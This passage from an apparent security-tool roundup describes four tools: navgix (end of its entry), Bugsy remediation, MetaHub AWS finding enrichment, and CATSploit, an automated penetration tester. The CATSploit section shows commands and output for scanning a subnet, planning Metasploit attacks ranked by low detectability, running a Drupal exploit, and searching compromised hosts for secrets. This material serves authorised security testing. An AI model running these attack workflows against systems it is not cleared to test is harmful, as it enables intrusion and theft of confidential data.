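    print(p, probe(base, p))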

Brute-force

navgix will also test a short list of directories that commonly have this vulnerability; if any of them exist, it will also attempt to confirm whether the vulnerability is present.

Installation

git clone https://github.com/Hakai-Offsec/navgix; cd navgix;
go build

Acknowledgements



Bugsy - Command-line Interface Tool That Provides Automatic Security Vulnerability Remediation For Your Code

By: Zion3R


Bugsy is a command-line interface (CLI) tool that provides automatic security vulnerability remediation for your code. It is the community edition version of Mobb, the first vendor-agnostic automated security vulnerability remediation tool. Bugsy is designed to help developers quickly identify and fix security vulnerabilities in their code.


What is Mobb?

Mobb is the first vendor-agnostic automatic security vulnerability remediation tool. It ingests SAST results from Checkmarx, CodeQL (GitHub Advanced Security), OpenText Fortify, and Snyk and produces code fixes for developers to review and commit to their code.

What does Bugsy do?

Bugsy has two modes - Scan (no SAST report needed) & Analyze (the user needs to provide a pre-generated SAST report from one of the supported SAST tools).

Scan

  • Uses Checkmarx or Snyk CLI tools to run a SAST scan on a given open-source GitHub/GitLab repo
  • Analyzes the vulnerability report to identify issues that can be remediated automatically
  • Produces the code fixes and redirects the user to the fix report page on the Mobb platform

Analyze

  • Analyzes a Checkmarx/CodeQL/Fortify/Snyk vulnerability report to identify issues that can be remediated automatically
  • Produces the code fixes and redirects the user to the fix report page on the Mobb platform

Disclaimer

This is a community edition version that only analyzes public GitHub repositories. Analyzing private repositories is allowed for a limited amount of time. Bugsy does not detect any vulnerabilities in your code; it uses findings detected by the SAST tools mentioned above.

Usage

You can simply run Bugsy from the command line, using npx:

npx mobbdev


CATSploit - An Automated Penetration Testing Tool Using Cyber Attack Techniques Scoring

By: Zion3R


CATSploit is an automated penetration testing tool using the Cyber Attack Techniques Scoring (CATS) method that can be used without a pentester. Currently, pentesters implicitly select suitable attack techniques for the target systems. CATSploit uses system configuration information such as OS, open ports, and software versions collected by a scanner, and calculates score values for capture (eVc) and detectability (eVd) of each attack technique for the target system. By selecting the highest score values, it is possible to select the most appropriate attack technique for the target system without professional pentester skills ("hack knack").

CATSploit automatically performs penetration tests in the following sequence:

  1. Information gathering and prior information input: First, gather information about the target systems. CATSploit supports nmap and OpenVAS for gathering information on target systems, and it also accepts prior information about the targets if you have it.

  2. Calculating score values of attack techniques: Using the information obtained in the previous phase and the attack techniques database, evaluation values for capture (eVc) and detectability (eVd) of each attack technique are calculated. The values of each attack technique are calculated for every target computer.

  3. Selection of attack techniques by using scores and making the attack scenario: Attack techniques are selected and attack scenarios are created according to pre-defined policies. For example, for a policy that prioritizes being hard to detect, the attack techniques with the lowest eVd (detectability score) will be selected.

  4. Execution of attack scenario: CATSploit executes the attack techniques according to the attack scenario constructed in the previous phase. CATSploit uses Metasploit as a framework and the Metasploit API to execute actual attacks.


Prerequisites

CATSploit has the following prerequisites:

  • Kali Linux 2023.2a

Installation

Metasploit, Nmap, and OpenVAS are assumed to be installed with the Kali distribution.

Installing CATSploit

To install the latest version of CATSploit, please use the following commands:

Cloning and setup
$ git clone https://github.com/catsploit/catsploit.git
$ cd catsploit
$ git clone https://github.com/catsploit/cats-helper.git
$ sudo ./setup.sh

Editing configuration file

CATSploit uses a server-client configuration, and the server reads a JSON configuration file at startup. In config.json, the following fields should be modified for your environment (an illustrative skeleton follows the list below).

  • DBMS
    • dbname: database name created for CATSploit
    • user: username of PostgreSQL
    • password: password of PostgreSQL
    • host: If you are using a database on a remote host, specify the IP address of the host
  • SCENARIO
    • generator.maxscenarios: Maximum number of scenarios to calculate (*)
  • ATTACKPF
    • msfpassword: password of MSFRPCD
    • openvas.user: username of OpenVAS
    • openvas.password: password of OpenVAS
    • openvas.maxhosts: Maximum number of hosts to be tested at the same time (*)
    • openvas.maxchecks: Maximum number of test items to be tested at the same time (*)
  • ATTACKDB
    • attack_db_dir: Path to the folder where AttackSteps are stored

(*) Adjust the number according to the specs of your machine.
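An illustrative config.json skeleton matching the fields above might look like the following; the exact key nesting is an assumption derived from the dotted field names listed here, so check the sample configuration shipped with the repository:

{
  "DBMS": {
    "dbname": "catsploit",
    "user": "postgres",
    "password": "password",
    "host": "localhost"
  },
  "SCENARIO": {
    "generator": { "maxscenarios": 100 }
  },
  "ATTACKPF": {
    "msfpassword": "password",
    "openvas": {
      "user": "admin",
      "password": "password",
      "maxhosts": 10,
      "maxchecks": 4
    }
  },
  "ATTACKDB": {
    "attack_db_dir": "/path/to/AttackSteps"
  }
}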

Usage

To start the server, execute the following command:

$ python cats_server.py -c [CONFIG_FILE]

Next, prepare another console, start the client program, and initiate a connection to the server.

$ python catsploit.py -s [SOCKET_PATH]

After successfully connecting to the server and initializing it, the session will start.

   _________  ___________       __      _ __
/ ____/ |/_ __/ ___/____ / /___ (_) /_
/ / / /| | / / \__ \/ __ \/ / __ \/ / __/
/ /___/ ___ |/ / ___/ / /_/ / / /_/ / / /_
\____/_/ |_/_/ /____/ .___/_/\____/_/\__/
/_/

[*] Connecting to cats-server
[*] Done.
[*] Initializing server
[*] Done.
catsploit>

The client can execute a variety of commands. Each command can be executed with -h option to display the format of its arguments.

usage: [-h] {host,scenario,scan,plan,attack,post,reset,help,exit} ...

positional arguments:
{host,scenario,scan,plan,attack,post,reset,help,exit}

options:
-h, --help show this help message and exit

I've posted the commands and options below as well for reference.

host list:
show information about the hosts
usage: host list [-h]
options:
-h, --help show this help message and exit

host detail:
show more information about one host
usage: host detail [-h] host_id
positional arguments:
host_id ID of the host for which you want to show information
options:
-h, --help show this help message and exit

scenario list:
show information about the scenarios
usage: scenario list [-h]
options:
-h, --help show this help message and exit

scenario detail:
show more information about one scenario
usage: scenario detail [-h] scenario_id
positional arguments:
scenario_id ID of the scenario for which you want to show information
options:
-h, --help show this help message and exit

scan:
run network-scan and security-scan
usage: scan [-h] [--port PORT] target_host [target_host ...]
positional arguments:
target_host IP address to be scanned
options:
-h, --help show this help message and exit
--port PORT ports to be scanned

plan:
planning attack scenarios
usage: plan [-h] src_host_id dst_host_id
positional arguments:
src_host_id originating host
dst_host_id target host
options:
-h, --help show this help message and exit

attack:
execute attack scenario
usage: attack [-h] scenario_id
positional arguments:
scenario_id ID of the scenario you want to execute

options:
-h, --help show this help message and exit

post find-secret:
find confidential information files that can be performed on the pwned host
usage: post find-secret [-h] host_id
positional arguments:
host_id ID of the host for which you want to find confidential information
options:
-h, --help show this help message and exit

reset:
reset data on the server
usage: reset [-h] {system} ...
positional arguments:
{system} reset system
options:
-h, --help show this help message and exit

exit:
exit CATSploit
usage: exit [-h]
options:
-h, --help show this help message and exit

Examples

In this example, we use CATSploit to scan network, plan the attack scenario, and execute the attack.

catsploit> scan 192.168.0.0/24
Network Scanning ... 100%
[*] Total 2 hosts were discovered.
Vulnerability Scanning ... 100%
[*] Total 14 vulnerabilities were discovered.
catsploit> host list
┏━━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━┓
┃ hostID   ┃ IP           ┃ Hostname ┃ Platform                ┃ Pwned ┃
┑━━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━┩
│ attacker │ 0.0.0.0      │ kali     │ kali 2022.4             │ True  │
│ h_exbiy6 │ 192.168.0.10 │          │ Linux 3.10 - 4.11       │ False │
│ h_nhqyfq │ 192.168.0.20 │          │ Microsoft Windows 7 SP1 │ False │
└──────────┴──────────────┴──────────┴─────────────────────────┴───────┘


catsploit> host detail h_exbiy6
┏━━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━┓
┃ hostID   ┃ IP           ┃ Hostname ┃ Platform     ┃ Pwned ┃
┑━━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━┩
│ h_exbiy6 │ 192.168.0.10 │ ubuntu   │ ubuntu 14.04 │ False │
└──────────┴──────────────┴──────────┴──────────────┴───────┘

[IP address]
┏━━━━━━━━━━━━━━┳━━━━━━━━━━┳━━━━━━┳━━━━━━━━━━━━┓
┃ ipv4         ┃ ipv4mask ┃ ipv6 ┃ ipv6prefix ┃
┑━━━━━━━━━━━━━━╇━━━━━━━━━━╇━━━━━━╇━━━━━━━━━━━━┩
│ 192.168.0.10 │          │      │            │
└──────────────┴──────────┴──────┴────────────┘

[Open ports]
┏━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━┳━━━━━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ ip           ┃ proto ┃ port ┃ service     ┃ product      ┃ version                    ┃
┑━━━━━━━━━━━━━━╇━━━━━━━╇━━━━━━╇━━━━━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
│ 192.168.0.10 │ tcp   │ 21   │ ftp         │ ProFTPD      │ 1.3.5                      │
│ 192.168.0.10 │ tcp   │ 22   │ ssh         │ OpenSSH      │ 6.6.1p1 Ubuntu 2ubuntu2.10 │
│ 192.168.0.10 │ tcp   │ 80   │ http        │ Apache httpd │ 2.4.7                      │
│ 192.168.0.10 │ tcp   │ 445  │ netbios-ssn │ Samba smbd   │ 3.X - 4.X                  │
│ 192.168.0.10 │ tcp   │ 631  │ ipp         │ CUPS         │ 1.7                        │
└──────────────┴───────┴──────┴─────────────┴──────────────┴────────────────────────────┘

[Vulnerabilities]
┏━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━┓
┃ ip           ┃ proto ┃ port ┃ vuln_name                                                           ┃ cve            ┃
┑━━━━━━━━━━━━━━╇━━━━━━━╇━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━┩
│ 192.168.0.10 │ tcp   │ 0    │ TCP Timestamps Information Disclosure                               │ N/A            │
│ 192.168.0.10 │ tcp   │ 21   │ FTP Unencrypted Cleartext Login                                     │ N/A            │
│ 192.168.0.10 │ tcp   │ 22   │ Weak MAC Algorithm(s) Supported (SSH)                               │ N/A            │
│ 192.168.0.10 │ tcp   │ 22   │ Weak Encryption Algorithm(s) Supported (SSH)                        │ N/A            │
│ 192.168.0.10 │ tcp   │ 22   │ Weak Host Key Algorithm(s) (SSH)                                    │ N/A            │
│ 192.168.0.10 │ tcp   │ 22   │ Weak Key Exchange (KEX) Algorithm(s) Supported (SSH)                │ N/A            │
│ 192.168.0.10 │ tcp   │ 80   │ Test HTTP dangerous methods                                         │ N/A            │
│ 192.168.0.10 │ tcp   │ 80   │ Drupal Core SQLi Vulnerability (SA-CORE-2014-005) - Active Check   │ CVE-2014-3704  │
│ 192.168.0.10 │ tcp   │ 80   │ Drupal Coder RCE Vulnerability (SA-CONTRIB-2016-039) - Active Check │ N/A            │
│ 192.168.0.10 │ tcp   │ 80   │ Sensitive File Disclosure (HTTP)                                    │ N/A            │
│ 192.168.0.10 │ tcp   │ 80   │ Unprotected Web App / Device Installers (HTTP)                      │ N/A            │
│ 192.168.0.10 │ tcp   │ 80   │ Cleartext Transmission of Sensitive Information via HTTP            │ N/A            │
│ 192.168.0.10 │ tcp   │ 80   │ jQuery < 1.9.0 XSS Vulnerability                                    │ CVE-2012-6708  │
│ 192.168.0.10 │ tcp   │ 80   │ jQuery < 1.6.3 XSS Vulnerability                                    │ CVE-2011-4969  │
│ 192.168.0.10 │ tcp   │ 80   │ Drupal 7.0 Information Disclosure Vulnerability - Active Check      │ CVE-2011-3730  │
│ 192.168.0.10 │ tcp   │ 631  │ SSL/TLS: Report Vulnerable Cipher Suites for HTTPS                  │ CVE-2016-2183  │
│ 192.168.0.10 │ tcp   │ 631  │ SSL/TLS: Report Vulnerable Cipher Suites for HTTPS                  │ CVE-2016-6329  │
│ 192.168.0.10 │ tcp   │ 631  │ SSL/TLS: Report Vulnerable Cipher Suites for HTTPS                  │ CVE-2020-12872 │
│ 192.168.0.10 │ tcp   │ 631  │ SSL/TLS: Deprecated TLSv1.0 and TLSv1.1 Protocol Detection          │ CVE-2011-3389  │
│ 192.168.0.10 │ tcp   │ 631  │ SSL/TLS: Deprecated TLSv1.0 and TLSv1.1 Protocol Detection          │ CVE-2015-0204  │
└──────────────┴───────┴──────┴─────────────────────────────────────────────────────────────────────┴────────────────┘

[Users]
┏━━━━━━━━━━━┳━━━━━━━┓
┃ user name ┃ group ┃
┑━━━━━━━━━━━╇━━━━━━━┩
└───────────┴───────┘


catsploit> plan attacker h_exbiy6
Planning attack scenario...100%
[*] Done. 15 scenarios was planned.
[*] To check each scenario, try 'scenario list' and/or 'scenario detail'.
catsploit> scenario list
┏━━━━━━━━━━━━━┳━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━━┳━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ scenario id ┃ src host ip ┃ target host ip ┃ eVc   ┃ eVd   ┃ steps ┃ first attack step             ┃
┑━━━━━━━━━━━━━╇━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━╇━━━━━━━╇━━━━━━━╇━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
│ 3d3ivc      │ 0.0.0.0     │ 192.168.0.10   │ 1.0   │ 32.0  │ 1     │ exploit/multi/http/jenkins_s… │
│ 5gnsvh      │ 0.0.0.0     │ 192.168.0.10   │ 1.0   │ 53.76 │ 2     │ exploit/multi/http/jenkins_s… │
│ 6nlxyc      │ 0.0.0.0     │ 192.168.0.10   │ 0.0   │ 48.32 │ 2     │ exploit/multi/http/jenkins_s… │
│ 8jos4z      │ 0.0.0.0     │ 192.168.0.10   │ 0.7   │ 72.8  │ 2     │ exploit/multi/http/jenkins_s… │
│ 8kmmts      │ 0.0.0.0     │ 192.168.0.10   │ 0.0   │ 32.0  │ 1     │ exploit/multi/elasticsearch/… │
│ agjmma      │ 0.0.0.0     │ 192.168.0.10   │ 0.0   │ 24.0  │ 1     │ exploit/windows/http/managee… │
│ joglhf      │ 0.0.0.0     │ 192.168.0.10   │ 70.0  │ 60.0  │ 1     │ auxiliary/scanner/ssh/ssh_lo… │
│ rmgrof      │ 0.0.0.0     │ 192.168.0.10   │ 100.0 │ 32.0  │ 1     │ exploit/multi/http/drupal_dr… │
│ xuowzk      │ 0.0.0.0     │ 192.168.0.10   │ 0.0   │ 24.0  │ 1     │ exploit/multi/http/struts_dm… │
│ yttv51      │ 0.0.0.0     │ 192.168.0.10   │ 0.01  │ 53.76 │ 2     │ exploit/multi/http/jenkins_s… │
│ znv76x      │ 0.0.0.0     │ 192.168.0.10   │ 0.01  │ 53.76 │ 2     │ exploit/multi/http/jenkins_s… │
└─────────────┴─────────────┴────────────────┴───────┴───────┴───────┴───────────────────────────────┘

catsploit> scenario detail rmgrof
┏━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━┓
┃ src host ip ┃ target host ip ┃ eVc   ┃ eVd  ┃
┑━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━╇━━━━━━━╇━━━━━━┩
│ 0.0.0.0     │ 192.168.0.10   │ 100.0 │ 32.0 │
└─────────────┴────────────────┴───────┴──────┘

[Steps]
┏━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━┓
┃ # ┃ step                                  ┃ params                ┃
┑━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━┩
│ 1 │ exploit/multi/http/drupal_drupageddon │ RHOSTS: 192.168.0.10  │
│   │                                       │ LHOST: 192.168.10.100 │
└───┴───────────────────────────────────────┴───────────────────────┘


catsploit> attack rmgrof
> ~> ~
> Metasploit Console Log
> ~
> ~
[+] Attack scenario succeeded!


catsploit> exit
Bye.

Disclaimer

All information and code are provided solely for educational purposes and/or for testing your own systems.

Contact

For any inquiry, please contact the email address as follows:

catsploit@nk.MitsubishiElectric.co.jp



Metahub - An Automated Contextual Security Findings Enrichment And Impact Evaluation Tool For Vulnerability Management

By: Zion3R


MetaHub is an automated contextual security findings enrichment and impact evaluation tool for vulnerability management. You can use it with AWS Security Hub or any ASFF-compatible security scanner. Stop relying on useless severities and switch to impact scoring definitions based on YOUR context.


MetaHub is an open-source security tool for impact-contextual vulnerability management. It can automate the process of contextualizing security findings based on your environment and your needs (YOUR context), identifying ownership, and calculating an impact score based on it that you can use for defining prioritization and automation. You can use it with AWS Security Hub or any ASFF security scanner (like Prowler).

MetaHub describes your context by connecting to your affected resources in your affected accounts. It can describe information about your AWS account and organization, the affected resources' tags, the affected CloudTrail events, your affected resource configurations, and all their associations: if you are contextualizing a security finding affecting an EC2 Instance, MetaHub will not only connect to the instance itself but also to its IAM Roles; from there, it will connect to the IAM Policies associated with those roles. It will connect to the Security Groups and analyze all their rules, the VPC and the Subnets where the instance is running, the Volumes, the Auto Scaling Groups, and more.

After fetching all the information from your context, MetaHub will evaluate certain important conditions for all your resources: exposure, access, encryption, status, environment, and application. Based on those calculations, combined with the information from all the security findings affecting the resource, MetaHub will generate a score for each finding.

Check the following dashboard generated by MetaHub. You have the affected resources, grouping all the security findings affecting them together and the original severity of the finding. After that, you have the Impact Score and all the criteria MetaHub evaluated to generate that score. All this information is filterable, sortable, groupable, downloadable, and customizable.



You can rely on this Impact Score for prioritizing findings (where should you start?), directing attention to critical issues, and automating alerts and escalations.

MetaHub can also filter, deduplicate, group, report, suppress, or update your security findings in automated workflows. It is designed for use as a CLI tool or within automated workflows, such as AWS Security Hub custom actions or AWS Lambda functions.

The following is the JSON output for an EC2 instance; see how MetaHub organizes all the information about its context together, under associations, config, tags, account, cloudtrail, and impact.



Context

In MetaHub, context refers to information about the affected resources like their configuration, associations, logs, tags, account, and more.

MetaHub doesn't stop at the affected resource but analyzes any associated or attached resources. For instance, if there is a security finding on an EC2 instance, MetaHub will not only analyze the instance but also the security groups attached to it, including their rules. MetaHub will examine the IAM roles that the affected resource is using and the policies attached to those roles for any issues. It will analyze the EBS attached to the instance and determine if they are encrypted. It will also analyze the Auto Scaling Groups that the instance is associated with and how. MetaHub will also analyze the VPC, Subnets, and other resources associated with the instance.

The Context module can retrieve information from the affected resources, the affected accounts, and every associated resource. It has five main parts: config (which also includes associations), tags, cloudtrail, and account. By default, config and tags are enabled, but you can change this behavior using the option --context (to enable all the context modules, use --context config tags cloudtrail account). The output of each enabled key will be added under the affected resource.

Config

Under the config key, you can find anything related to the configuration of the affected resource. For example, if the affected resource is an EC2 Instance, you will see keys like private_ip, public_ip, or instance_profile.

You can filter your findings based on Config outputs using the option: --mh-filters-config <key> {True/False}. See Config Filtering.

Associations

Under the associations key, you will find all the associated resources of the affected resource. For example, if the affected resource is an EC2 Instance, you will find resources like: Security Groups, IAM Roles, Volumes, VPC, Subnets, Auto Scaling Groups, etc. Each time MetaHub finds an association, it will connect to the associated resource again and fetch its own context.

Associations are key to understanding the context and impact of your security findings, such as their exposure.

You can filter your findings based on Associations outputs using the option: --mh-filters-config <key> {True/False}. See Config Filtering.

Tags

MetaHub relies on AWS Resource Groups Tagging API to query the tags associated with your resources.

Note that not all AWS resource types support this API. You can check the supported services.

Tags are a crucial part of understanding your context. Tagging strategies often include:

  • Environment (like Production, Staging, Development, etc.)
  • Data classification (like Confidential, Restricted, etc.)
  • Owner (like a team, a squad, a business unit, etc.)
  • Compliance (like PCI, SOX, etc.)

If you follow a proper tagging strategy, you can filter and generate interesting outputs. For example, you could list all findings related to a specific team and provide that data directly to that team.

You can filter your findings based on Tags outputs using the option: --mh-filters-tags TAG=VALUE. See Tags Filtering

CloudTrail

Under the key cloudtrail, you will find critical CloudTrail events related to the affected resource, such as creation events.

The CloudTrail events that we look for are defined per resource type, and you can add, remove, or change them by editing the configuration file resources.py.

For example, for an affected resource of type Security Group, MetaHub will look for the following events:

  • CreateSecurityGroup: Security Group Creation event
  • AuthorizeSecurityGroupIngress: Security Group Rule Authorization event.

Account

Under the key account, you will find information about the account where the affected resource is running, such as whether it is part of an AWS Organization, information about its contacts, etc.

Ownership

MetaHub also focuses on ownership detection. It can determine the owner of the affected resource in various ways. This information can be used to automatically assign a security finding to the correct owner, escalate it, or make decisions based on this information.

An automated way to determine the owner of a resource is critical for security teams. It allows them to focus on the most critical issues and escalate them to the right people in automated workflows. But automating workflows this way is only viable if you have a reliable way to define the impact of a finding, which is why MetaHub also focuses on impact.

Impact

The impact module in MetaHub focuses on generating a score for each finding based on the context of the affected resource and all the security findings affecting it. For the context, we define a series of evaluated criteria; you can add, remove, or modify these criteria based on your needs. The impact criteria are combined with a metric generated from all the security findings affecting the affected resource and their severities.

The following are the impact criteria that MetaHub evaluates by default:

Exposure

Exposure evaluates how the affected resource is exposed to other networks. For example, it checks whether the affected resource is public, whether it is part of a VPC, whether it has a public IP, and whether it is protected by a firewall or a security group.

Possible Statuses     Value  Description
effectively-public    100%   The resource is effectively public from the Internet.
restricted-public     40%    The resource is public, but there is a restriction, like a Security Group.
unrestricted-private  30%    The resource is private but unrestricted, like an open security group.
launch-public         10%    These are resources that can launch other resources as public, for example an Auto Scaling Group or a Subnet.
restricted            0%     The resource is restricted.
unknown               -      The resource couldn't be checked.

Access

Access evaluates the resource policy layer. MetaHub checks every available policy, including IAM managed policies, IAM inline policies, resource policies, bucket ACLs, and any association to other resources like IAM Roles, whose policies are also analyzed. An unrestricted policy is not only an issue for that policy itself; it affects every other resource that uses it.

Possible Statuses        Value  Description
unrestricted             100%   The principal is unrestricted, without any condition or restriction.
untrusted-principal      70%    The principal is an AWS account that is not part of your trusted accounts.
unrestricted-principal   40%    The principal is not restricted, defined with a wildcard. There could be conditions restricting it or other restrictions like S3 public access blocks.
cross-account-principal  30%    The principal is from another AWS account.
unrestricted-actions     30%    The actions are defined using wildcards.
dangerous-actions        30%    Some dangerous actions are defined as part of this policy.
unrestricted-service     10%    The policy allows an AWS service as principal without restriction.
restricted               0%     The policy is restricted.
unknown                  -      The policy couldn't be checked.

Encryption

Encryption evaluates the different encryption layers based on each resource type. For example, for some resources it evaluates whether both at_rest and in_transit encryption are enabled.

Possible Statuses  Value  Description
unencrypted        100%   The resource is not fully encrypted.
encrypted          0%     The resource is fully encrypted, including any of its associations.
unknown            -      The resource encryption couldn't be checked.

Status

Status evaluates the status of the affected resource in terms of attachment or functioning. For example, for an EC2 Instance we evaluate whether the resource is running, stopped, or terminated, but for resources like EBS Volumes and Security Groups, we evaluate whether those resources are attached to any other resource.

Possible Statuses  Value  Description
attached           100%   The resource supports attachment and is attached.
running            100%   The resource supports running and is running.
enabled            100%   The resource supports enabled and is enabled.
not-attached       0%     The resource supports attachment and is not attached.
not-running        0%     The resource supports running and is not running.
not-enabled        0%     The resource supports enabled and is not enabled.
unknown            -      The resource couldn't be checked for status.

Environment

Environment evaluates the environment where the affected resource is running. By default, MetaHub defines three environments: production, staging, and development, but you can add, remove, or modify these environments based on your needs. MetaHub evaluates the environment based on the tags of the affected resource, the account ID, or the account alias. You can define your own environment definitions and strategy in the configuration file (see Customizing Configuration).

Possible Statuses  Value  Description
production         100%   It is a production resource.
staging            30%    It is a staging resource.
development        0%     It is a development resource.
unknown            -      The resource couldn't be checked for environment.

Application

Application evaluates the application that the affected resource is part of. MetaHub relies on the AWS myApplications feature, which relies on the tag awsApplication, but you can extend this functionality based on your context, for example by defining other tags you use for defining applications or services (like Service or any other), or by relying on the account ID or alias. You can define your application definitions and strategy in the configuration file (see Customizing Configuration).

Possible Statuses  Value  Description
unknown            -      The resource couldn't be checked for application.

Findings Scoring

As part of the impact score calculation, we also evaluate the total amount of security findings and their severities affecting the resource. We use the following formula to calculate this metric:

(SUM of all (Finding Severity / Highest Severity) with a maximum of 1)

For example, if the affected resource has two findings affecting it, one with HIGH and another with LOW severity, the Impact Findings Score will be:

SUM(HIGH (3) / CRITICAL (4) + LOW (0.5) / CRITICAL (4)) = 0.875
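
As a quick illustration of the formula and the example above, here is a minimal Python sketch; the numeric weights for LOW, HIGH, and CRITICAL are taken from the worked example, the function name is arbitrary, and other severity labels would need their own weights.

# Minimal sketch of the Findings Scoring metric described above.
SEVERITY_WEIGHTS = {"LOW": 0.5, "HIGH": 3, "CRITICAL": 4}
HIGHEST = SEVERITY_WEIGHTS["CRITICAL"]

def findings_score(severity_labels):
    # SUM of (finding severity / highest severity), capped at a maximum of 1.
    total = sum(SEVERITY_WEIGHTS[label] / HIGHEST for label in severity_labels)
    return min(total, 1)

print(findings_score(["HIGH", "LOW"]))  # 0.875, matching the example above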

Architecture

MetaHub reads your security findings from AWS Security Hub or any ASFF-compatible security scanner. It then queries the affected resources directly in the affected account to provide additional context. Based on that context, it calculates the impact. Finally, it generates different outputs based on your needs.



Use Cases

Some use cases for MetaHub include:

  • MetaHub integration with Prowler as a local scanner for context enrichment
  • Automating Security Hub findings suppression based on Tagging
  • Integrate MetaHub as a Security Hub custom action to use it directly from the AWS Console
  • Create enriched HTML reports for your findings that you can filter, sort, group, and download
  • Create Security Hub Insights based on MetaHub context

Features

MetaHub provides a range of ways to list and manage security findings for investigation, suppression, updating, and integration with other tools or alerting systems. To avoid Shadowing and Duplication, MetaHub organizes related findings together when they pertain to the same resource. For more information, refer to Findings Aggregation.

MetaHub queries the affected resources directly in the affected account to provide additional context using the following options:

  • Config: Fetches the most important configuration values from the affected resource.
  • Associations: Fetches all the associations of the affected resource, such as IAM roles, security groups, and more.
  • Tags: Queries tagging from affected resources.
  • CloudTrail: Queries CloudTrail in the affected account to identify who created the resource and when, as well as any other related critical events.
  • Account: Fetches extra information from the account where the affected resource is running, such as the account name, security contacts, and other information.

MetaHub supports filters on top of these context outputs to automate the detection of other resources with the same issues. You can filter security findings affecting resources tagged in a certain way (e.g., Environment=production) and combine this with filters based on Config or Associations, for example whether the resource is public, whether it is encrypted, whether it is part of a VPC, or whether it is using a specific IAM role. For more information, refer to Config filters and Tags filters.

But that's not all. If you are using MetaHub with Security Hub, you can even combine the previous filters with the Security Hub native filters (AWS Security Hub filtering). You can filter the same way you would with the AWS CLI utility using the option --sh-filters, but in addition, you can save and re-use your filters as YAML files using the option --sh-template.

If you prefer, with MetaHub you can enrich your findings back directly in AWS Security Hub using the option --enrich-findings. This action will update your AWS Security Hub findings using the field UserDefinedFields. You can then create filters or Insights directly in AWS Security Hub and take advantage of the contextualization added by MetaHub.

When investigating findings, you may need to update many security findings at once. MetaHub allows you to execute bulk updates to AWS Security Hub findings, such as changing the Workflow Status, using the option --update-findings. For example, say you identified hundreds of security findings about public resources, but based on the MetaHub context you know those resources are not effectively public because they are protected by routing and firewalls. You can update all the findings returned by your MetaHub query with one command. When updating findings using MetaHub, you also update the field Note of your finding with a custom text for future reference.

MetaHub supports different Output Modes, some of them JSON-based, like json-inventory, json-statistics, json-short, and json-full, but also powerful html, xlsx, and csv outputs. These outputs are customizable; you can choose which columns to show. For example, you may need a report about your affected resources that adds the tags Owner, Service, and Environment and nothing else. Check the configuration file and define the columns you need.

MetaHub supports multi-account setups. You can run the tool from any environment by assuming roles in your AWS Security Hub master account and your child/service accounts where your resources live. This allows you to fetch aggregated data from multiple accounts using your AWS Security Hub multi-account implementation while also fetching and enriching those findings with data from the accounts where your affected resources live based on your needs. Refer to Configuring Security Hub for more information.

Customizing Configuration

MetaHub uses configuration files that let you customize some checks behaviors, default filters, and more. The configuration files are located in lib/config/.

Things you can customize:

  • lib/config/configuration.py: This file contains the default configuration for MetaHub. You can change the default filters, the default output modes, the environment definitions, and more.

  • lib/config/impact.py: This file contains the values and their weights for the impact formula criteria. You can modify the values and the weights based on your needs.

  • lib/config/resources.py: This file contains definitions for every resource type, like which CloudTrail events to look for.

Run with Python

MetaHub is a Python3 program. You need to have Python3 installed in your system and the required Python modules described in the file requirements.txt.

Requirements can be installed in your system manually (using pip3) or using a Python virtual environment (suggested method).

Run it using Python Virtual Environment

  1. Clone the repository: git clone git@github.com:gabrielsoltz/metahub.git
  2. Change to the repository dir: cd metahub
  3. Create a virtual environment for this project: python3 -m venv venv/metahub
  4. Activate the virtual environment you just created: source venv/metahub/bin/activate
  5. Install Metahub requirements: pip3 install -r requirements.txt
  6. Run: ./metahub -h
  7. Deactivate your virtual environment after you finish with: deactivate

Next time, you only need steps 4 and 6 to use the program.

Alternatively, you can run this tool using Docker.

Run with Docker

MetaHub is also available as a Docker image. You can run it directly from the public Docker image or build it locally.

The available tags for the MetaHub container are the following:

  • latest: in sync with master branch
  • <x.y.z>: you can find the releases here
  • stable: this tag always points to the latest release.

For running from the public registry, you can run the following command:

docker run -ti public.ecr.aws/n2p8q5p4/metahub:latest ./metahub -h

AWS credentials and Docker

If you are already logged into the AWS host machine, you can seamlessly use the same credentials within a Docker container. You can achieve this by either passing the necessary environment variables to the container or by mounting the credentials file.

For instance, you can run the following command:

docker run -e AWS_DEFAULT_REGION -e AWS_ACCESS_KEY_ID -e AWS_SECRET_ACCESS_KEY -e AWS_SESSION_TOKEN -ti public.ecr.aws/n2p8q5p4/metahub:latest ./metahub -h
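
Alternatively, as a sketch of the credentials-file approach mentioned above (assuming your credentials live in the default ~/.aws directory and that the container runs as root), you can mount that directory into the container:

docker run -v ~/.aws:/root/.aws:ro -ti public.ecr.aws/n2p8q5p4/metahub:latest ./metahub -h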

On the other hand, if you are not logged in on the host machine, you will need to log in again from within the container itself.

Build and Run Docker locally

Or you can also build it locally:

git clone git@github.com:gabrielsoltz/metahub.git
cd metahub
docker build -t metahub .
